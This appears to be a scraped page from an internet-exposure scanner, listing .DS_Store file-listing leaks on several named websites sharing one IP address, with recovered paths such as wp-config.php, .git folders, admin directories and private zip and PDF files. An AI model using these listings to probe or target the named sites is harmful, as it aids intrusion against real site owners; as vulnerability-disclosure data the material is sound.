Fingerprint: 5f32cf5d6962f09cecc85b04ecc85b04e86d46ed2be25d86f5667ee88f3bbac5Found 53 files trough .DS_Store spidering: /_notes /images /images/company_images /images/images /index.html /Sunny Corn /Sunny Corn/images /Wood_furniture_restoration_&_refurbishing /Wood_furniture_restoration_&_refurbishing/AC_RunActiveContent.js /Wood_furniture_restoration_&_refurbishing/Back-ground-Din-Home.gif /Wood_furniture_restoration_&_refurbishing/Buy_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Choice-of-stains.gif /Wood_furniture_restoration_&_refurbishing/DIN-Home-Web-Hosting-Limited-Time-Offer.gif /Wood_furniture_restoration_&_refurbishing/DIN-HOME_Coffee_Table_Images.html /Wood_furniture_restoration_&_refurbishing/DIN.docx /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 0.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 01.jpg /Wood_furniture_restoration_&_refurbishing/dinhome ecotable picture 1.jpg /Wood_furniture_restoration_&_refurbishing/DINHOME-Logo.jpg /Wood_furniture_restoration_&_refurbishing/dinhome.jpg /Wood_furniture_restoration_&_refurbishing/ECO Bench Ottoman 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 1.9 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table 2.4 /Wood_furniture_restoration_&_refurbishing/ECO Coffee Table Images.swf /Wood_furniture_restoration_&_refurbishing/Eco Friendly Table.jpg /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Bench-Ottoman-2.4.gif /Wood_furniture_restoration_&_refurbishing/Eco-Coffee-Table--Birch-Finish.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-1.9image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.1image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4-image.gif /Wood_furniture_restoration_&_refurbishing/ECO-Coffee-Table-2.4.gif /Wood_furniture_restoration_&_refurbishing/favicon.ico /Wood_furniture_restoration_&_refurbishing/index.css /Wood_furniture_restoration_&_refurbishing/index.html /Wood_furniture_restoration_&_refurbishing/Natural-Finish.gif /Wood_furniture_restoration_&_refurbishing/Natural_ECO_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Pricing /Wood_furniture_restoration_&_refurbishing/Produits_Maison_DIN_Home_Products_Contact.html /Wood_furniture_restoration_&_refurbishing/Register and Start Selling /Wood_furniture_restoration_&_refurbishing/Scripts /Wood_furniture_restoration_&_refurbishing/sitemap.xml /Wood_furniture_restoration_&_refurbishing/SpryAssets /Wood_furniture_restoration_&_refurbishing/Stain_Color_for_Eco_Coffee_Table.html /Wood_furniture_restoration_&_refurbishing/Stained Finishing.psd /Wood_furniture_restoration_&_refurbishing/Stained-Finishing.gif /Wood_furniture_restoration_&_refurbishing/Stained_&_Varnished_Coffee Table.html /Wood_furniture_restoration_&_refurbishing/Tables Home Products and web hosting.jpg /Wood_furniture_restoration_&_refurbishing/Varnished-Birch-Coffee-Table-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished-For-Protection.gif /Wood_furniture_restoration_&_refurbishing/Varnished_ECO_Coffee_Table.html
Found on 2023-09-28 22:32 -
Severity: low
Fingerprint: 5f32cf5d6962f09c1a5d9b0f1a5d9b0f661bc6c861963df20051ecb80051ecb8Found 3 files trough .DS_Store spidering: /images /images/company_images /index.html
Found on 2022-10-21 18:03
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: crescofamilydentistry.com
Port: 443
URL: https://crescofamilydentistry.comFirst seen 2022-09-03 17:48
Last seen 2024-09-16 10:53
Open for 743 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c87f05b7087f05b70375faefa4ce46cd5179878e9afa5fbd6Found 26 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-16 10:53 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146b0b68ebdd68da4928bc84bb7202e1ad59Found 21 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/themes /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-09-16 05:52 -
Severity: low
Fingerprint: 5f32cf5d6962f09c668fcbec668fcbec9fac0e6672cfcb39a5c2afdd8a3c8cc6Found 17 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-includes /wp-snapshots
Found on 2024-09-14 02:43 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cef4770e6ef4770e677d071b8249d3e0bef342ccf792ff97eFound 42 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-snapshots
Found on 2024-09-06 18:54 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c7d264b917d264b9160849753017c087673603fa87cbe0457Found 52 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-content/uploads/2014 /wp-content/uploads/2014/10 /wp-content/uploads/2015 /wp-includes /wp-includes/certificates /wp-includes/css /wp-includes/fonts /wp-includes/ID3 /wp-includes/images /wp-includes/js /wp-includes/pomo /wp-includes/SimplePie /wp-includes/Text /wp-includes/theme-compat /wp-snapshots
Found on 2024-09-02 14:20 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aa2be5c6ac9bbf5177d3bcbc9ba083170cFound 33 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-08-28 22:18 -
Severity: medium
Fingerprint: 5f32cf5d6962f09cb3107650b31076505d8d3f5a68139ff5a664350911313d28Found 39 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-admin/css /wp-admin/images /wp-admin/includes /wp-admin/js /wp-admin/maint /wp-admin/network /wp-admin/user /wp-content /wp-content/plugins /wp-content/plugins/advanced-custom-fields /wp-content/plugins/custom-post-type-ui /wp-content/plugins/duplicator /wp-content/plugins/site-is-offline-plugin /wp-content/plugins/ultimate-maintenance-mode /wp-content/themes /wp-content/themes/cfd /wp-content/themes/cfd/_notes /wp-content/themes/cfd/assets /wp-content/themes/cfd/assets/css /wp-content/themes/cfd/assets/fonts /wp-content/themes/cfd/assets/img /wp-content/themes/cfd/assets/js /wp-content/themes/cfd/assets/less /wp-content/themes/cfd/assets/vendor /wp-content/themes/cfd/lang /wp-content/themes/cfd/lib /wp-content/themes/cfd/templates /wp-content/themes/twentyfifteen /wp-content/upgrade /wp-content/uploads /wp-includes /wp-snapshots
Found on 2024-08-24 15:20 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733f267656412fc17a2402c7a0ee4f232867Found 10 files trough .DS_Store spidering: /.idea /.idea/_notes /.idea/scopes /.metadata /_notes /cgi-bin /wp-admin /wp-content /wp-includes /wp-snapshots
Found on 2022-09-03 17:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.sydney.austynandbrian.com
Port: 443
URL: https://www.sydney.austynandbrian.comFirst seen 2022-11-23 18:39
Last seen 2024-09-16 09:48
Open for 662 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 09:48
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-15 18:48
Last seen 2024-09-16 09:21
Open for 670 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-09-16 09:21 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-09-08 21:02 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-08-28 04:37 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-08-22 09:08 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-08-20 08:14 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fad82b89f858ea44a282594c078c97bdeFound 10 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /storage /vendor
Found on 2024-08-14 06:41 -
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a01a619ebcabab5f858f67bfe7153b3243Found 13 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-08-12 06:27 -
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcb3f27bc0f1583bf9b622747351ac7f20Found 22 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic
Found on 2024-08-10 10:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09cab28146bab28146bd709a4939e89f2aeca6749acb9c6f979Found 21 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor
Found on 2024-08-02 08:26 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-07-30 22:06
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-10-20 18:18
Last seen 2024-09-16 09:20
Open for 696 days-
Severity: high
Fingerprint: 5f32cf5d6962f09c778888b4778888b43443393d58fc2c8742783f2be340ec03Found 40 files trough .DS_Store spidering: /admin-ajax.php /after_disaster_relief.css /after_disaster_relief.html /all_dropdown.css /commercial_dinhome_home.css /commercial_renovations.css /commercial_renovations.html /constrcution_worker_jobs_employment.css /constrcution_worker_jobs_employment.html /demolition.css /demolition.html /demolition_frame2.png /dinhome_contact.html /dinhome_home.css /dinhome_home_projects.css /favicon-16x16.png /favicon-32x32.png /home_renovations.css /home_renovations.html /images /images/logo-DinHome-Design.png /index.html /interior_design.css /interior_design.html /job /main.css /new_construction.css /new_construction.html /NK2502_Topo_anglais_2020-02-07_Land_Serveyor.dwg /privacy_statement_of_dinhome_design.html /privacy_statement_of_dinhome_design_main.css /project_management.css /project_management.html /projects_progress_folders /projects_progress_folders.zip /Rapport étude de sol lot SOIL SAMPLES # 1 557 039.PDF /respond.min.js /SpryAssets /structural_modifications.css /structural_modifications.html
Found on 2024-09-16 09:20
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.workbookz.snowbel.com
Port: 443
URL: https://www.workbookz.snowbel.comFirst seen 2022-09-15 17:38
Last seen 2024-09-16 09:18
Open for 731 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-16 09:18 -
Severity: low
Fingerprint: 5f32cf5d6962f09c11d3744d11d3744d7da9d3d1721513ecb65012164009fb37Found 12 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-08 22:12 -
Severity: low
Fingerprint: 5f32cf5d6962f09cc169dbbec169dbbeb528917e25902aaf5d00bdb5c2c1e2b6Found 15 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /storage /vendor
Found on 2024-09-06 13:52 -
Severity: low
Fingerprint: 5f32cf5d6962f09cdafa5447dafa54477e9c741770974cf2312fc9a86ce8753cFound 18 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/front /storage /vendor
Found on 2024-09-01 11:05 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fad82b89f858ea44a282594c078c97bdeFound 10 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /storage /vendor
Found on 2024-08-28 18:24 -
Severity: low
Fingerprint: 5f32cf5d6962f09c0f8dcf020f8dcf022cde107afb89857b45585b797b886794Found 24 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser /vendor/nikic/php-parser/grammar
Found on 2024-08-05 05:00 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3838040e3838040e63c0c24ebce1d55f2bae9bc5f6c52a62Found 20 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /vendor
Found on 2024-07-20 22:30 -
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea969d9d335f9934f705c12d53258a00b9eFound 23 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /resources/views/admin /resources/views/admin/admin /resources/views/admin/include /resources/views/front /storage /storage/app /vendor /vendor/nikic /vendor/nikic/php-parser
Found on 2024-07-16 11:25 -
Severity: low
Fingerprint: 5f32cf5d6962f09c026392ab026392ab7a4b325398b29a745914566c0e320c5eFound 7 files trough .DS_Store spidering: /app /config /public /resources /resources/views /storage /vendor
Found on 2024-07-14 11:05 -
Severity: low
Fingerprint: 5f32cf5d6962f09c47dfe71947dfe719e3814ae542659040cc07a8e2c152138aFound 16 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /app/Http/Requests/Admin /config /public /resources /resources/views /storage /vendor
Found on 2024-07-02 12:12 -
Severity: low
Fingerprint: 5f32cf5d6962f09cec7f8772ec7f8772692eda2ae0770a4b788811a919097056Found 11 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /resources/views /storage /vendor
Found on 2024-06-06 01:52 -
Severity: low
Fingerprint: 5f32cf5d6962f09c3af247253af247251dec61f970f3a6842d5ea24eb2f28027Found 9 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /config /public /resources /storage /vendor
Found on 2024-06-04 16:21
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2024-02-05 18:31
Last seen 2024-09-16 09:00
Open for 223 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 09:00
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-11-23 18:39
Last seen 2024-09-16 08:45
Open for 662 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c9e04c3bc9e04c3bcd4b2e02b0b9199b13a9ccd230330a715Found 22 files trough .DS_Store spidering: /index.php /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 08:45
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
IP: 162.241.253.33
Domain: www.mizakires.katmandu.mx
Port: 443
URL: https://www.mizakires.katmandu.mxFirst seen 2022-12-12 18:37
Last seen 2024-09-16 08:40
Open for 643 days-
Severity: low
Fingerprint: 5f32cf5d6962f09cae99eea9ae99eea96367f45a086ed07d01b7f20fc0dbb463Found 23 files trough .DS_Store spidering: /index.php /jetpack-onboarding /license.txt /loader.php /mojo-package.sh /readme.html /wp-activate.php /wp-admin /wp-blog-header.php /wp-comments-post.php /wp-config-sample.php /wp-config.php /wp-content /wp-cron.php /wp-includes /wp-links-opml.php /wp-load.php /wp-login.php /wp-mail.php /wp-settings.php /wp-signup.php /wp-trackback.php /xmlrpc.php
Found on 2024-09-16 08:40
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-12-18 18:41
Last seen 2024-09-16 08:33
Open for 637 days-
Severity: medium
Fingerprint: 5f32cf5d6962f09cd4047824d40478241b871cc2a40ce067d868b186c56b30b4Found 35 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/all/libraries/less.php /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-09-16 08:33 -
Severity: low
Fingerprint: 5f32cf5d6962f09cf35cbfb3f35cbfb391cb3501500dced2dac33721c3fa9fc9Found 29 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-07-20 15:46 -
Severity: medium
Fingerprint: 5f32cf5d6962f09c2acf29aa2acf29aabe06c3b48ae79529658ffac091255406Found 33 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-06-20 17:20 -
Severity: medium
Fingerprint: 5f32cf5d6962f09ca629b8b1a629b8b143a27af3538b923450299d7b7927ec8aFound 34 files trough .DS_Store spidering: /.DS_Store /.git /.gitignore /.htaccess /authorize.php /CHANGELOG.txt /COPYRIGHT.txt /cron.php /includes /index.php /INSTALL.mysql.txt /INSTALL.pgsql.txt /install.php /INSTALL.sqlite.txt /INSTALL.txt /LICENSE.txt /MAINTAINERS.txt /misc /modules /profiles /README.txt /robots.txt /scripts /sites /sites/all /sites/all/libraries /sites/default /sites/example.sites.php /sites/README.txt /themes /update.php /UPGRADE.txt /web.config /xmlrpc.php
Found on 2024-04-30 23:29
-
-
MacOS file listing through .DS_Store file
.DS_Store” is an abbreviation for “Desktop Services Store”. These files are created automatically by Apples “Finder” software (which is part of their OS).
They store information about the files within a folder, including display options of folders, such as icon positions and view settings.
It may happen that .DS_Store files inadvertently leak filenames such as database backups or private administration panels.
First seen 2022-09-15 17:38
Last seen 2024-09-16 07:40
Open for 731 days-
Severity: low
Fingerprint: 5f32cf5d6962f09c11d3744d11d3744d7da9d3d1721513ecb65012164009fb37Found 12 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-16 07:40 -
Severity: low
Fingerprint: 5f32cf5d6962f09c39aac35b39aac35b22ee27c3c0b24ffef617025c0b216be3Found 14 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-14 08:40 -
Severity: low
Fingerprint: 5f32cf5d6962f09c8329733f8329733fad82b89f858ea44a282594c078c97bdeFound 10 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Console/Commands /app/Http /config /public /resources /storage /vendor
Found on 2024-09-10 13:39 -
Severity: low
Fingerprint: 5f32cf5d6962f09cccdd54a0ccdd54a01a619ebcabab5f858f67bfe7153b3243Found 13 files trough .DS_Store spidering: /app /app/Classes /app/Console /app/Http /app/Http/Controllers /app/Http/Controllers/Admin /app/Http/Controllers/front /app/Http/Requests /config /public /resources /storage /vendor
Found on 2024-09-04 23:11 -
Severity: low
